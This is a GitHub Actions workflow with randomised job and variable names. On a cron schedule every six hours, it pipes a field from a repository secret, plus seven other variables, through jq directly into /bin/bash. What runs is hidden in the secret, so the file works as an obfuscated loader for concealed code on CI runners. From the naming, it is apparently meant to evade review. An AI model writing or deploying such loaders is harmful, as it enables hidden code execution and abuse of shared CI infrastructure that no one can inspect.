name: shiximian1894
on:
  workflow_dispatch:
  schedule:
    - cron: '57 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shiximian1894
        env:
          vwf0430: ${{ secrets.vwf0430 }}
        run: |
          echo $vwf0430 | jq -r .ohdog85 | /bin/bash
          echo $mw38 | jq -r .ejslk4 | /bin/bash
          echo $uj188 | jq -r .xpihf62833 | /bin/bash
          echo $wstp69416 | jq -r .nw07068 | /bin/bash
          echo $vz114 | jq -r .dicgp090 | /bin/bash
          echo $lux9042 | jq -r .n1 | /bin/bash
          echo $wi9 | jq -r .ufxlz722 | /bin/bash
          echo $m15952 | jq -r .zjk338 | /bin/bash

